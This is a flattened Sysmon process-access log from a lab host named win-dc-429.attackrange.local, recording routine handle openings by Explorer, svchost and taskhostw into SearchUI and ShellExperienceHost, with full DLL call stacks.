09:21:48.650{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000001055815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.650{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7a5e|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.650{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7a5e|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.650{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b704c|C:\Windows\System32\TwinUI.dll+b6a5e|C:\Windows\System32\TwinUI.dll+b7a5e|C:\Windows\System32\TwinUI.dll+ffcc7|C:\Windows\System32\TwinUI.dll+1005a7|C:\Windows\System32\TwinUI.dll+101417|C:\Windows\System32\TwinUI.dll+cecf4|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.650{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f23cc|C:\Windows\System32\TwinUI.dll+b2d24|C:\Windows\System32\TwinUI.dll+aea6b|C:\Windows\System32\TwinUI.dll+cecda|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.634{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.634{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.634{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.634{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.619{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.619{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+a9af6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.619{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.603{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.603{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.603{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.603{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.603{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+18aac|C:\Windows\SYSTEM32\psmserviceexthost.dll+e47e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e517|C:\Windows\SYSTEM32\psmserviceexthost.dll+e22a|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e78|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001055795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}4632516C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001055794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+83c5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b9c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.587{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b3b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 